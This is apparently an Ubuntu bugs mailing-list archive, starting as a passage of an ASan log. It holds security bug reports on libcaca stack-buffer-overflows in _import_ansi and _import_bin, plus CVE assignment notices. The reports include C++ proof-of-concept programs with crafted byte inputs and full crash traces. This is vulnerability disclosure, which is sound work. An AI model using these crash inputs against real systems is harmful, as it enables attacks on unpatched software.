+ #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
- #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
+ #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
- This frame has 1 object(s):
- [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this
variable
+ This frame has 1 object(s):
+ [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this
variable
HINT: this may be a false positive if your program uses some custom stack
unwind mechanism, swapcontext or vfork
- (longjmp and C++ exceptions *are* supported)
+ (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
Shadow bytes around the buggy address:
- 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[Bug 1925467] [NEW] stack-buffer-overflow of text.c in function _import_ansi
*** This bug is a security vulnerability ***
Public security bug reported:
Hello ubuntu security team
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1
libcaca version e4968ba
Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library
$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or
$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g
-fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link
-fsanitize-coverage=bb"
$ make
3.Create the poc_ansi.cc && build
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
void crash(const uint8_t *Data, size_t Size) {
if(Size<8) return ;
size_t len=0;
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
caca_create_frame(cv,0);
caca_set_frame(cv,0);
caca_import_canvas_from_memory(cv,Data,Size,"ansi");
caca_free_canvas(cv);
cv=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x20,0x4a,0x0c,0x0a,0x20,0x0a,0x20,0x0c,0xc,0xc};
len = sizeof(buffer)/sizeof(unsigned char);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
crash((const uint8_t*)buffer,len);
return 0;
}
4.compile poc_ansi.cc
clang++ -g poc_ansi.cc -O2 -fno-omit-frame-pointer -fsanitize=address
-I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_ansi
5.Run poc_ansi
asan info:
=
==3763372==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7ffda0164bea at pc 0x7f098d82c310 bp 0x7ffda01647b0 sp 0x7ffda01647a8
READ of size 1 at 0x7ffda0164bea thread T0
#0 0x7f098d82c30f in _import_ansi
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38
#1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
#2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
#3 0x7f098d2780b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_mbay+0x41c38d)
Address 0x7ffda0164bea is located in stack of thread T0 at offset 42 in frame
#0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
This frame has 1 object(s):
[32, 42) 'buffer' (line 31) <== Memory access at offset 42 overflows this
variable
HINT: this may be a false positive if your program uses some custom stack
unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow
/home/hh/Downloads/libcaca/caca/codec/text.c:391:38 in _import_ansi
Shadow bytes around the buggy address:
0x100034024920: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
0x100034024930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2 f2 f2
0x100034024940: f2 f2 f8 f2 f2 f2 f8 f3 f3 f3 f3 f3 00 00 00 00
0x100034024950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100034024960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100034024970: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00[02]f3 f3
0x100034024980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100034024990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000340249a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000340249b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000340249c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user:f7
Container overflow: fc
Array cookie:ac
Intra object redzone:bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone:cb
Shadow gap: cc
==3763372==ABORTING
Thanks
** Affects: libcaca (Ubuntu)
Importance: Undecided
Status: New
** Information type changed from Public to Public Security
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1925467
Title:
stack-buffer-overflow of text.c in function _import_ansi
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1925467/+subscriptions
--
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
[Bug 1925468] [NEW] stack-buffer-overflow of import.c in function _import_bin
*** This bug is a security vulnerability ***
Public security bug reported:
Hello ubuntu security team
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1
libcaca version e4968ba
Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library
$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or
$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g
-fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2
-fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link
-fsanitize-coverage=bb"
$ make
3.Create the poc_bin.cc && build
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include
#include
#include
#include
#include
#include
using namespace std;
void crash(const uint8_t *Data, size_t Size) {
if(Size<8) return ;
size_t len=0;
caca_canvas_t *cv;
cv = caca_create_canvas(0,0);
caca_create_frame(cv,0);
caca_set_frame(cv,0);
caca_import_canvas_from_memory(cv,Data,Size,"bin");
caca_free_canvas(cv);
cv=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] =
{0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
len = sizeof(buffer)/sizeof(unsigned char);
printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
crash((const uint8_t*)buffer,len);
return 0;
}
4.compile poc_bin.cc
clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/
-lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin
5.Run poc_bin
asan info:
=
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
#0 0x7f8c6314acfc in _import_bin
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33
#1 0x4c6c72 in crash(unsigned char const*, unsigned long)
/home/hh/Downloads/libcaca/poc_bin.cc:21:3
#2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
#3 0x7f8c62ba00b2 in __libc_start_main
/build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)
Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
#0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28
This frame has 1 object(s):
[32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this
variable
HINT: this may be a false positive if your program uses some custom stack
unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow
/home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
Shadow bytes around the buggy address:
0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user:f7
Container overflow: fc
Array cookie:ac
Intra object redzone:bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone:cb
Shadow gap: cc
==3817476==ABORTING
Thanks
** Affects: libcaca (Ubuntu)
Importance: Undecided
Status: New
** Information type changed from Public to Public Security
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1925468
Title:
stack-buffer-overflow of import.c in function _import_bin
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1925468/+subscriptions
--
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
[Bug 1923538] Re: jhead heap-buffer-overflow of exif.c in function Get16u
Issues have been assigned numbers CVE-2021-3496 ** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3496 ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/1923538 Title: jhead heap-buffer-overflow of exif.c in function Get16u To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/jhead/+bug/1923538/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
[Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
Issues have been assigned numbers CVE-2021-30498、CVE-2021-30499 ** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30498 ** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30499 -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to the bug report. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1923273/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
[Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Summary changed: - libcaca buffer-overflow + buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to the bug report. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1923273/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
[Bug 1923273] Re: libcaca buffer-overflow
Debian 10 libcaca0/now 0.9.beta19-2.1 Fedora 33 Name: libcaca version : 0.99 Release :0.51.beta19.fc33 -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to the bug report. https://bugs.launchpad.net/bugs/1923273 Title: libcaca buffer-overflow To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1923273/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
[Bug 1923273] Re: libcaca buffer-overflow
source code ## Affected Product Code Base libcaca, 0.99.beta20 Ubuntu 20.04 libcaca 0.99.beta19 -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to the bug report. https://bugs.launchpad.net/bugs/1923273 Title: libcaca buffer-overflow To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcaca/+bug/1923273/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
[Bug 1919305] Re: gpac application crashes on read
Thanks for you -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to the bug report. https://bugs.launchpad.net/bugs/1919305 Title: gpac application crashes on read To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gpac/+bug/1919305/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
